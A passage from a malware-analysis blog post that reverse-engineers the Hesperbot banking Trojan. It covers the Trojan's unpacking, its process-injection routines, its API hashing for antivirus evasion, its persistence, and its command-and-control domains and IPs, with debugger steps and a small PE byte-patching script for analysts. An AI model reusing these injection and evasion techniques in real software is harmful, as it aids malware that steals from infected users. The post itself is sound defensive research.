<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikldlORPysVdY3_Dhq5sAPgnEa0ao2w0IaZGa9FAGnosWetLJZ0RKoDXWPH3uOlp8_h7RQ7ZNjMqX7LNvL6KHbw3rV71bZPCa3pJ3dn99d1vdjbTD3XE_339OyzOhKxZYVznH6r4n-/s1600/002GettingKernelThruTIB.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikldlORPysVdY3_Dhq5sAPgnEa0ao2w0IaZGa9FAGnosWetLJZ0RKoDXWPH3uOlp8_h7RQ7ZNjMqX7LNvL6KHbw3rV71bZPCa3pJ3dn99d1vdjbTD3XE_339OyzOhKxZYVznH6r4n-/s320/002GettingKernelThruTIB.png" /></a><br />
<br />
It allocates another memory region using kernel32.VirtualAlloc and decrypts part of its data (the dropper module) into it. As you can see in the figure below, the encrypted data is on the left and the decrypted data, beginning with an MZ-PE header, is on the right.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG-eyGiSV3ftYouym1ECc6wwUvTzEE-c_CC6xj5eHxaXafwq4e_hlHPTCnt_uQ_K4hxMMlb_m2Wps34AxMn7ZQRFWToYdR1NViBViKa0Y-6lAQ-V6uIQnIAg6_D-72pj4bJYC0fUOn/s1600/003DecryptedMZPE.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG-eyGiSV3ftYouym1ECc6wwUvTzEE-c_CC6xj5eHxaXafwq4e_hlHPTCnt_uQ_K4hxMMlb_m2Wps34AxMn7ZQRFWToYdR1NViBViKa0Y-6lAQ-V6uIQnIAg6_D-72pj4bJYC0fUOn/s320/003DecryptedMZPE.png" /></a><br />
<br />
This data is then written over the memory image of the original process, with kernel32.VirtualProtect used first so that writing to the committed pages of the original process does not raise access violations.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcUAScAQafenGGcZqqi2FRmKp6T97npEHTKUktc3MFIn4L0xkqvkvHBxLJF6Kmq_cuFO896gpbP9zAJ0-Khw2rPm_6gNSsuU-axS1Px7hLOzLBSeeAZ666UE7AJZtl6Kpsr1wLIkBK/s1600/004PopulateIAT.png"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcUAScAQafenGGcZqqi2FRmKp6T97npEHTKUktc3MFIn4L0xkqvkvHBxLJF6Kmq_cuFO896gpbP9zAJ0-Khw2rPm_6gNSsuU-axS1Px7hLOzLBSeeAZ666UE7AJZtl6Kpsr1wLIkBK/s320/004PopulateIAT.png" width="320" /></a><br />
<br />
All the necessary APIs are then gathered and stored in its Import Address Table (IAT) using kernel32.LoadLibraryA and kernel32.GetProcAddress.<br />
<br />
Code execution is then transferred to the <b><i>injector </i></b>module at 0x0044744F.<br />
<br />
<h3>
The Injector</h3>
The Trojan hashes and stores several pieces of system information that identify the infected computer once it connects to a C&C server:<br />
<br />
<ul>
<li>computer name</li>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate</li>
<li>system version (like service pack number)</li>
<li>processor architecture (x86, AMD64, IA64)</li>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid</li>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId</li>
</ul>
It creates multiple randomly generated mutex and semaphore names with the following format:<br />
<randommutex>.mutex<br />
<randomsemaphore>.semaphore<br />
<br />
A system infected with the Hesperbot Trojan can be easily recognised by these names.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjWuxvUdTnQ1NmdZkvIz4BLu2aNxxoFVqPjm2EqhHB6FZoEJg51si4v9N-LFv6apTgtYuq5JcnUGcJ47-k2ZVMBHv42fOlMvCcI-iEqTh5NFU6TXpFGPldP-d4oC_nJLF_tQCHLS0v/s1600/MutexSemaphores.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjWuxvUdTnQ1NmdZkvIz4BLu2aNxxoFVqPjm2EqhHB6FZoEJg51si4v9N-LFv6apTgtYuq5JcnUGcJ47-k2ZVMBHv42fOlMvCcI-iEqTh5NFU6TXpFGPldP-d4oC_nJLF_tQCHLS0v/s320/MutexSemaphores.png" /></a><br />
<br />
It then creates two folders (Sun and a randomly named directory) in which it stores an encrypted copy of itself as <random>.bkp and <random>.dat. The folder location varies by operating system:<br />
<br />
For WinXP:<br />
<br />
<ul>
<li>%ALLUSERSPROFILE%\Application Data\Sun\<random>.bkp</li>
<li>%ALLUSERSPROFILE%\Application Data\<RandomDirName>\<random>.dat</li>
</ul>
<br />
For Win7 and above:<br />
<br />
<ul>
<li>%ALLUSERSPROFILE%\Sun\<random>.bkp</li>
<li>%ALLUSERSPROFILE%\<RandomDirName>\<random>.dat</li>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglq3F-v45lermwnLfMrSmHLFtuscvjg4N89laEfbg2d2mx5RAgEdrndzUakmdkcuVjepft59kc1AJGmPb_Ezy0g1Acu9z-sxrERglIQEpAq-b-PgNr4yZEiUJPQIVzg9xRE_bzIwYS/s1600/datbkp.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglq3F-v45lermwnLfMrSmHLFtuscvjg4N89laEfbg2d2mx5RAgEdrndzUakmdkcuVjepft59kc1AJGmPb_Ezy0g1Acu9z-sxrERglIQEpAq-b-PgNr4yZEiUJPQIVzg9xRE_bzIwYS/s320/datbkp.png" /></a><br />
<br />
It then generates platform-specific loader code after checking the OS architecture with GetNativeSystemInfo.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj69k-SB5yyQogmhyphenhyphen21WVlzo3Z8c2PlQynSEHul_NrwE1hcXgrEjYiC4v20_oxDu8mfOlwa8sK2U3z0QjDXaBz7zX9ztuYSTp0e2XalvTEhzNjeopOZl7MHrJCrTNyBhljs1O5D_U47/s1600/32x64bitCheck.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj69k-SB5yyQogmhyphenhyphen21WVlzo3Z8c2PlQynSEHul_NrwE1hcXgrEjYiC4v20_oxDu8mfOlwa8sK2U3z0QjDXaBz7zX9ztuYSTp0e2XalvTEhzNjeopOZl7MHrJCrTNyBhljs1O5D_U47/s320/32x64bitCheck.png" /></a><br />
<br />
Hesperbot has three ways of injecting its core module into explorer.exe, and which one it uses depends on whether cmdguard.sys or klif.sys exists on the system. The three scenarios are listed below.<br />
<br />
<br />
<ul>
<li>SCENARIO 1: %systemroot%\system32\drivers\cmdguard.sys exists (Comodo Firewall Guard driver)</li>
<ul>
<li>copy procedure to high memory and transfer execution</li>
<li>spawn suspended process of explorer.exe using kernel32.CreateProcessW</li>
<li>craft bytes in stack that will jump to malware code in memory</li>
<li>modify explorer.exe entry-point and insert the crafted bytes from stack using kernel32.VirtualProtectEx and kernel32.WriteProcessMemory</li>
<li>resume suspended process using ntdll.ZwResumeThread</li>
</ul>
</ul>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtPHBWUsqkvCMQHJ0TJJWzkiw0aUBHj-egUX9gzAUcO3DCcHa-M9RxgCzaClfMGPA3jPw_cbUzUDWvz22ZfbM_wJ3n9xY9HzSsJVIqRgfDMdGo-HFApxHYCzezYzulgluc34j-mH-r/s1600/cmdguard_sys.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtPHBWUsqkvCMQHJ0TJJWzkiw0aUBHj-egUX9gzAUcO3DCcHa-M9RxgCzaClfMGPA3jPw_cbUzUDWvz22ZfbM_wJ3n9xY9HzSsJVIqRgfDMdGo-HFApxHYCzezYzulgluc34j-mH-r/s320/cmdguard_sys.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqWWaNygXxvBLFVLrbVD-IxFlxoD-9bH2p2JvmiUGtRUd0sHGn6emkAhgFYhlkPzTc52xJoS3AiT9OXdywOCURF91LHjftS0rurzJL8twATFJpicOLJBSCM0KLPus09AuttXM7O6FC/s1600/JmpOffset.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqWWaNygXxvBLFVLrbVD-IxFlxoD-9bH2p2JvmiUGtRUd0sHGn6emkAhgFYhlkPzTc52xJoS3AiT9OXdywOCURF91LHjftS0rurzJL8twATFJpicOLJBSCM0KLPus09AuttXM7O6FC/s320/JmpOffset.png" /></a><br />
<ul>
<li>SCENARIO 2: %systemroot%\system32\drivers\klif.sys exists (Kaspersky Antivirus system driver)</li>
<ul>
<li>copy core procedure to memory</li>
<li>spawn suspended process of attrib.exe using kernel32.CreateProcessW</li>
<li>craft bytes in stack that will jump to malware code in memory</li>
<li>modify attrib.exe entry-point and insert the crafted bytes from stack using kernel32.VirtualProtectEx and kernel32.WriteProcessMemory</li>
<li>resume process of attrib.exe using ntdll.ZwResumeThread</li>
<li>injected code in attrib.exe uses kernel32.CreateRemoteThread in order to create a new thread that will inject the core module to explorer.exe</li>
</ul>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCEHL93dmSGmN5_c3hIqNr5R7eUOqGzQ5QmWBYkVptbGD1KDdLtMmELzeVONC9S6EjLxwJbKgkri1MC3dVfMFwiFG9AqCQtq1xNkAYDMSgBbC2QVpwg5MqDdbxvkvkhKN8BgeY36q/s1600/CreateProcAttrib.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCEHL93dmSGmN5_c3hIqNr5R7eUOqGzQ5QmWBYkVptbGD1KDdLtMmELzeVONC9S6EjLxwJbKgkri1MC3dVfMFwiFG9AqCQtq1xNkAYDMSgBbC2QVpwg5MqDdbxvkvkhKN8BgeY36q/s320/CreateProcAttrib.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGosKYc-aMhkeeyfA42d6BTwcFQMzZdO_Tde6LW74ifQw-w94pRAq96pFQL0dxhPDbpgd3DKQaW6BLjunGPQLFqNGh2YXgAJZYLMrOFEd391O31dQP_0vi0flTcgKK66Km-WYkO0KI/s1600/CreateRemoteThread.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGosKYc-aMhkeeyfA42d6BTwcFQMzZdO_Tde6LW74ifQw-w94pRAq96pFQL0dxhPDbpgd3DKQaW6BLjunGPQLFqNGh2YXgAJZYLMrOFEd391O31dQP_0vi0flTcgKK66Km-WYkO0KI/s320/CreateRemoteThread.png" /></a><br />
<ul>
<li>SCENARIO 3: cmdguard.sys and klif.sys do not exist</li>
<ul>
<li>copy core procedure to memory</li>
<li>spawn suspended process of attrib.exe using kernel32.CreateProcessW</li>
<li>craft bytes in stack that will jump to malware code in memory</li>
<li>modify attrib.exe entry-point and insert the crafted bytes from stack using kernel32.VirtualProtectEx and kernel32.WriteProcessMemory</li>
<li>resume process of attrib.exe using ntdll.ZwResumeThread</li>
<li>the injected code in attrib.exe spawns explorer.exe in a suspended state</li>
<li>it makes use of a Windows messaging vulnerability to trigger shellcode execution in the explorer.exe address space (commonly known as PowerLoader injection: <a href="http://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html">http://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html</a>)</li>
<li>the shellcode uses CreateThread and VirtualAlloc to pass execution to the core module</li>
</ul>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFq3gbxEoqp-IYUoOKpzLNDPYxHw5j-YS1muvUXBjKWAMagTEOUQeBA4RMPUw8wqGAnMkntS3Tob0ZdOMGy2Nam-C_IBbhzlBtLKEFJEGUEWtExg_5-G6n5pAv2Y3VvubgE5AcD7lL/s1600/shell_traywnd.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFq3gbxEoqp-IYUoOKpzLNDPYxHw5j-YS1muvUXBjKWAMagTEOUQeBA4RMPUw8wqGAnMkntS3Tob0ZdOMGy2Nam-C_IBbhzlBtLKEFJEGUEWtExg_5-G6n5pAv2Y3VvubgE5AcD7lL/s320/shell_traywnd.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZsqvKXxAPBIBY8-0qHOsJ7ELjQFH_g7qgxqA_6w8NIiMGypjeRYKTNvSRgFyShNKG5Ca3d0gdQrb168fJhxpAY8a1jPBG8Tsjznpu82TCXakHhfh-c6RtbsUk2PZ3_WxojLD7dG2Q/s1600/shell_traywnd2.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZsqvKXxAPBIBY8-0qHOsJ7ELjQFH_g7qgxqA_6w8NIiMGypjeRYKTNvSRgFyShNKG5Ca3d0gdQrb168fJhxpAY8a1jPBG8Tsjznpu82TCXakHhfh-c6RtbsUk2PZ3_WxojLD7dG2Q/s320/shell_traywnd2.png" /></a><br />
<br />
For debugging purposes, these are the steps on how I got to trace the shell code:<br />
<br />
<div class="MsoListParagraph">
1. First, identify which shell code will be executed. For this sample of Hesperbot, its shell code starts at 0x0044A77C – E8 29 00 00 00</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1lt-vedV0fj-X6Ey61ZH2Rl2ESxI7ffSjsvLpSJBDXZY7mK8JlW7aemcddeQ6GZIkrPwxRAi_zKenO6Y3SnQezkidHuNd1CMpZec7pyQxfNd3Tb4iWsVUHJ0eR5c2gjrSjK3LoGua/s1600/shellcode.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1lt-vedV0fj-X6Ey61ZH2Rl2ESxI7ffSjsvLpSJBDXZY7mK8JlW7aemcddeQ6GZIkrPwxRAi_zKenO6Y3SnQezkidHuNd1CMpZec7pyQxfNd3Tb4iWsVUHJ0eR5c2gjrSjK3LoGua/s320/shellcode.png" /></a><br />
2. Replace the first byte 0xE8 with 0xCC (int 3) and save this modified copy.<br />
<div class="MsoListParagraph">
3. In OllyDbg, go to Options -> Just-in-time debugging, click “Make OllyDbg just-in-time debugger”, then exit OllyDbg.</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgicl0R6ZiFWsMWlSe95wxGajfhsElFrkI54NjOQLw33fpfNF_qzOS2syRPxA91zvfi-mbDOja3fbVXjySlD36dcutcCuV_LYBk4xZP-kYA1F8nJFQVi7QMSui9_zCLxYKjzbr6DFWx/s1600/OllyJustInTime.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgicl0R6ZiFWsMWlSe95wxGajfhsElFrkI54NjOQLw33fpfNF_qzOS2syRPxA91zvfi-mbDOja3fbVXjySlD36dcutcCuV_LYBk4xZP-kYA1F8nJFQVi7QMSui9_zCLxYKjzbr6DFWx/s1600/OllyJustInTime.png" /></a><br />
4. Now execute your modified copy of the malware; it should crash Windows Explorer.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFdZ5zM8RQhwzA-UMtl7ehLuKmgIwjYiRt34qPHTy17QbNu18Qjo9o-30y52LSAhi0EILvdHrvoQmQVeoOIZdKqdgNPqhCLQ2hyphenhyphenLm_YKxwii75RrL-xYhQbt4Ht3A3oxKRT-UN1A02/s1600/ExplorerCrash.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFdZ5zM8RQhwzA-UMtl7ehLuKmgIwjYiRt34qPHTy17QbNu18Qjo9o-30y52LSAhi0EILvdHrvoQmQVeoOIZdKqdgNPqhCLQ2hyphenhyphenLm_YKxwii75RrL-xYhQbt4Ht3A3oxKRT-UN1A02/s320/ExplorerCrash.png" /></a><br />
5. Hit the “Debug” button and OllyDbg should pop up; restore the modified byte from 0xCC to 0xE8 and start tracing the shell code!<br />
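The address-to-offset translation and the byte swap from steps 2 and 5, as an added Python example (not code from this post): the virtual address is mapped to a file offset through the PE section table and the expected 0xE8 is verified before anything is written. The PE it builds is a constructed stand-in, so its addresses differ from the Hesperbot sample's 0x0044A77C.<br />

```python
"""Swap a CALL opcode (0xE8) for INT 3 (0xCC) at a virtual address in a PE on disk.

Added example (not from the post): automates steps 2 and 5 of the OllyDbg
just-in-time procedure. The VA is mapped to a file offset via the section table,
the expected opcode is verified before patching, and build_sample_pe() constructs
a small PE32 stand-in, so its addresses are not the Hesperbot sample's.
"""
import struct

IMAGE_BASE = 0x400000      # constructed: ImageBase of the demo PE
TEXT_RVA = 0x1000          # constructed: .text VirtualAddress
TEXT_RAW = 0x400           # constructed: .text PointerToRawData
TEXT_SIZE = 0x200          # constructed: .text SizeOfRawData
SHELLCODE_RVA = 0x1010     # constructed: RVA of the bytes "E8 29 00 00 00"


def parse_sections(pe: bytes):
    """Return (image_base, [(name, va, vsize, raw_ptr, raw_size), ...])."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:      # PE32: ImageBase is a DWORD at optional header + 28
        image_base = struct.unpack_from("<I", pe, opt + 28)[0]
    elif magic == 0x20B:    # PE32+: ImageBase is a QWORD at optional header + 24
        image_base = struct.unpack_from("<Q", pe, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%X" % magic)
    sections = []
    pos = opt + opt_size    # the section table follows the optional header
    for _ in range(num_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, pos)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, raw_ptr, raw_size))
        pos += 40
    return image_base, sections


def va_to_file_offset(pe: bytes, va: int) -> int:
    """Translate a virtual address to an offset in the on-disk image."""
    image_base, sections = parse_sections(pe)
    rva = va - image_base
    for name, sec_va, vsize, raw_ptr, raw_size in sections:
        if sec_va <= rva < sec_va + max(vsize, raw_size):
            delta = rva - sec_va
            if delta >= raw_size:   # virtual-only tail (e.g. .bss): no file bytes
                raise ValueError("VA 0x%X has no file-backed bytes in %s" % (va, name))
            return raw_ptr + delta
    raise ValueError("VA 0x%X is outside every section" % va)


def patch_byte(pe: bytes, va: int, expected: int, new: int) -> bytes:
    """Return a patched copy; refuse if the byte at va is not the expected one,
    which catches a wrong address or a differently laid-out sample."""
    off = va_to_file_offset(pe, va)
    if pe[off] != expected:
        raise ValueError("byte at 0x%X is 0x%02X, expected 0x%02X" % (va, pe[off], expected))
    buf = bytearray(pe)
    buf[off] = new
    return bytes(buf)


def set_int3(pe: bytes, va: int) -> bytes:
    """Step 2: CALL (0xE8) -> INT 3 (0xCC) so the host process traps into the JIT debugger."""
    return patch_byte(pe, va, 0xE8, 0xCC)


def restore_call(pe: bytes, va: int) -> bytes:
    """Step 5: put the original 0xE8 back before tracing."""
    return patch_byte(pe, va, 0xCC, 0xE8)


def build_sample_pe() -> bytes:
    """Constructed PE32 with one .text section holding E8 29 00 00 00 at SHELLCODE_RVA."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)  # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<I", opt, 16, SHELLCODE_RVA)   # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, IMAGE_BASE)      # ImageBase
    section = struct.pack("<8sIIIIIIHHI", b".text", TEXT_SIZE, TEXT_RVA, TEXT_SIZE,
                          TEXT_RAW, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section).ljust(TEXT_RAW, b"\0")
    text = bytearray(TEXT_SIZE)
    start = SHELLCODE_RVA - TEXT_RVA
    text[start:start + 5] = bytes.fromhex("E829000000")
    return headers + bytes(text)


if __name__ == "__main__":
    sample = build_sample_pe()
    target = IMAGE_BASE + SHELLCODE_RVA
    off = va_to_file_offset(sample, target)
    print("VA 0x%X -> file offset 0x%X, byte 0x%02X" % (target, off, sample[off]))
    print("after set_int3: 0x%02X" % set_int3(sample, target)[off])
```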
<br />
These are the hashes of the APIs used by the Hesperbot Trojan; hashing API names instead of storing them as plain strings protects it from easy detection by AV vendors.<br />
<br />
<ul>
<li>0xB02814B6 = kernel32.ExpandEnvironmentStringsW</li>
<li>0x002CFE2B = kernel32.CreateFileW</li>
<li>0xB376CE13 = kernel32.lstrlenW</li>
<li>0xA24F346A = kernel32.CreateProcessW</li>
<li>0x107B9483 = kernel32.WriteProcessMemory</li>
<li>0x1A471325 = kernel32.VirtualProtectEx</li>
<li>0xFDEB2A69 = kernel32.IsProcessorFeaturePresent</li>
<li>0x8D70B719 = kernel32.IsWow64Process</li>
<li>0x4B892318 = kernel32.CreateRemoteThread</li>
<li>0x26662FCC = kernel32.CreateThread</li>
<li>0xDF894B12 = kernel32.VirtualAlloc</li>
</ul>
<ul>
<li>0x3708EE6B = ntdll.ZwCreateSection</li>
<li>0xC477C525 = ntdll.ZwMapViewOfSection</li>
<li>0x2015436B = ntdll.ZwResumeThread</li>
<li>0xB85C56EA = ntdll.ZwTerminateProcess</li>
<li>0x3F66C5FF = ntdll.ZwGetContextThread</li>
<li>0xD1E48C8B = ntdll.ZwSetContextThread</li>
<li>0x4C7D8945 = ntdll.ZwDelayExecution</li>
<li>0x7B005F26 = ntdll._allmul</li>
<li>0x0BD5C7BD = ntdll.ZwQueryInformationProcess</li>
<li>0x87CE75D8 = ntdll.ZwClose</li>
<li>0xE3086B33 = ntdll.ZwOpenProcess</li>
<li>0x35013E23 = ntdll.ZwTerminateThread</li>
<li>0xA2E76D4C = ntdll.ZwOpenThread</li>
<li>0x6DD66096 = ntdll.ZwQueryInformationThread</li>
<li>0x8EAE85FE = ntdll.ZwReadVirtualMemory</li>
<li>0xAAD44E29 = ntdll.ZwOpenSection</li>
<li>0xB7EF35F4 = ntdll.RtlCreateUserThread</li>
</ul>
<ul>
<li>0x9CD6615A = user32.FindWindowA</li>
<li>0x4A4627DC = user32.GetWindowThreadProcessId</li>
<li>0x3CC18006 = user32.SendMessageW</li>
<li>0x8252D56B = user32.SetWindowLongW</li>
<li>0x1FFBFCD8 = user32.GetClassName</li>
<li>0x52BD91BC = user32.SystemParametersInfoW</li>
<li>0xD563318F = user32.RegisterClassExW</li>
<li>0x835DB020 = user32.CreateWindowExW</li>
<li>0x8252D56B = user32.GetMessageW</li>
<li>0x8252D56B = user32.TranslateMessage</li>
<li>0x2776DB53 = user32.DispatchMessageW</li>
</ul>
<br />
<h3>
The Hesperbot Core</h3>
Execution then passes to the core module once it has been injected into explorer.exe. As usual, it must first gather all the APIs it needs, using kernel32.LoadLibrary and kernel32.GetProcAddress.<br />
<br />
It then sets its thread priority to THREAD_PRIORITY_ABOVE_NORMAL so that it is scheduled ahead of most other active threads in explorer.exe.<br />
<br />
It also attempts to set explorer.exe’s integrity level to LOWINTEGRITYLEVEL_FULLACCESS, so that new processes (such as other downloaded malicious modules) running with a higher integrity level than explorer.exe have read/write access to it.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdbOyMk6hbbbMdiax-yesydX1He3JV6TZW1PHQ0QvyKSZPfgXwoexyW9oUyAWg7tOCj9BONw5sIQ_JKlO3HiNTvrVsGKp-CD1QE3KWEdoN89r4mPDviVAL-Z53XFHczDEWcSJf6q9o/s1600/SetIntegrityLevel.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdbOyMk6hbbbMdiax-yesydX1He3JV6TZW1PHQ0QvyKSZPfgXwoexyW9oUyAWg7tOCj9BONw5sIQ_JKlO3HiNTvrVsGKp-CD1QE3KWEdoN89r4mPDviVAL-Z53XFHczDEWcSJf6q9o/s320/SetIntegrityLevel.png" /></a><br />
<br />
<br />
Integrity levels are a kernel security feature introduced in Windows Vista. You can read more about them at <a href="https://en.wikipedia.org/wiki/Mandatory_Integrity_Control">https://en.wikipedia.org/wiki/Mandatory_Integrity_Control</a>.<br />
<br />
The core then creates mutexes for itself named Global\inst_&lt;randomstring&gt; and Global\&lt;randomstring&gt;.<br />
<br />
It then checks which process it has been injected into. It does this by hashing the current process filename with its own hashing algorithm and comparing the result against a table of hashes found in its body. So far, these are the hashes I recovered from that table through trial and error. Understand that recovering the remaining process names is near impossible because of how the malware author designed the hashing algorithm.<br />
<br />
<ul>
<li>0x11955DB8: explorer.exe</li>
<li>0xAAF840B5: csrss.exe</li>
<li>0x1FC97071: svchost.exe</li>
<li>0x537B492F: iexplore.exe</li>
<li>0x76379A9A: firefoxe.exe</li>
<li>0xCA846265: chrome.exe</li>
<li>0x6FB8169E: opera.exe</li>
<li>0x9544710B: browser.exe</li>
<li>0x78AB2C5C: webkit2webprocess.exe</li>
<li>0x2771AA06: maxthon.exe</li>
<li>0xB64FEEED: sleipnir.exe</li>
<li>0xE80C41EC: deepnet.exe</li>
<li>0x30B15DB3: seamonkey.exe</li>
<li>0x532A495F: k-meleon.exe</li>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihzRK16NMLYsN55k6eKVn36mnwZes1MeRx1Dbma9Nz9kO8_6UAPGo6iwKQ_1qrZRmqnJAuGz3y6CN96n76407MMSLdSq2yoBssXmVuJVgQaztXj309oH5_XBbVEmP1_PQbR0TcMfy5/s1600/hashTable.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihzRK16NMLYsN55k6eKVn36mnwZes1MeRx1Dbma9Nz9kO8_6UAPGo6iwKQ_1qrZRmqnJAuGz3y6CN96n76407MMSLdSq2yoBssXmVuJVgQaztXj309oH5_XBbVEmP1_PQbR0TcMfy5/s320/hashTable.png" /></a><br />
<br />
As you can see, most of these hashes are process names of known web browsers. This gives us a hint that it will try to monitor web activity at some point.<br />
<br />
The core module is responsible for creating a copy of the trojan at %windir%\&lt;randomFolder&gt;\&lt;randomFileName&gt;.exe. This executable is also referenced by a REGRUN entry at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “randomValueName” to ensure it runs automatically on Windows startup.<br />
<br />
It will check for a valid internet connection by querying websites like:<br />
<br />
<ul>
<li>http://wikipedia.org</li>
<li>http://facebook.com</li>
<li>http://google.com</li>
<li>http://microsoft.com</li>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFxPxSkMmZnVbwcDmxFhk-34Y_BnQVryIyP7NMF3bkUIUAU3W5dULXBn8rhlJ3ef38Ywi7gApNu_-nSIawULV-vwe1Ok7POeTRT_j1PMCYc0FVxma3VmH3gzHK5tQ1Ry_T4aIICeFB/s1600/VerifyInternetConn.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFxPxSkMmZnVbwcDmxFhk-34Y_BnQVryIyP7NMF3bkUIUAU3W5dULXBn8rhlJ3ef38Ywi7gApNu_-nSIawULV-vwe1Ok7POeTRT_j1PMCYc0FVxma3VmH3gzHK5tQ1Ry_T4aIICeFB/s320/VerifyInternetConn.png" /></a><br />
<br />
It then attempts to connect to its control server over HTTPS on port 443. Its control server can be any of the following:<br />
<br />
<ul>
<li>whoischeck.biz</li>
<li>192.31.186.116</li>
<li>188.241.112.29</li>
<li>5.63.152.44</li>
<li>96.43.141.186</li>
<li>94.126.178.29</li>
</ul>
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUVctC_tjgXVTUbvwvYdGgQs60h_QxEBtprJLaZ220XyYchZ92kD1VFl91GVI0Y_FjtU-11Q1GvmlAKuC5_SXReh9GqQ21Zz2KDPQMVrRHW_p3Yoed28kUrkIgfZ7lQ82OoypS0MFo/s1600/whoischeck.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUVctC_tjgXVTUbvwvYdGgQs60h_QxEBtprJLaZ220XyYchZ92kD1VFl91GVI0Y_FjtU-11Q1GvmlAKuC5_SXReh9GqQ21Zz2KDPQMVrRHW_p3Yoed28kUrkIgfZ7lQ82OoypS0MFo/s320/whoischeck.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXduEIn30d2DaDpmM_SP2hE6CLlC-CGBLEJPDPonWi4NhZMGUA8E48npn5-SXmLBeHD83JmMjrf5VKGR8SduBk4uyFsMJkwhSkGw6Mi_ICC2AhML3GfYSzs5mbzCobJanRZa5Xv71N/s1600/HttpOpenRequest.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXduEIn30d2DaDpmM_SP2hE6CLlC-CGBLEJPDPonWi4NhZMGUA8E48npn5-SXmLBeHD83JmMjrf5VKGR8SduBk4uyFsMJkwhSkGw6Mi_ICC2AhML3GfYSzs5mbzCobJanRZa5Xv71N/s320/HttpOpenRequest.png" /></a><br />
<br />
If the default control server (whoischeck.biz) does not respond to the request, it continues through the other control servers listed above using a Domain Generation Algorithm (DGA), in which a random domain name is used in order to evade generic antivirus detection.<br />
<br />
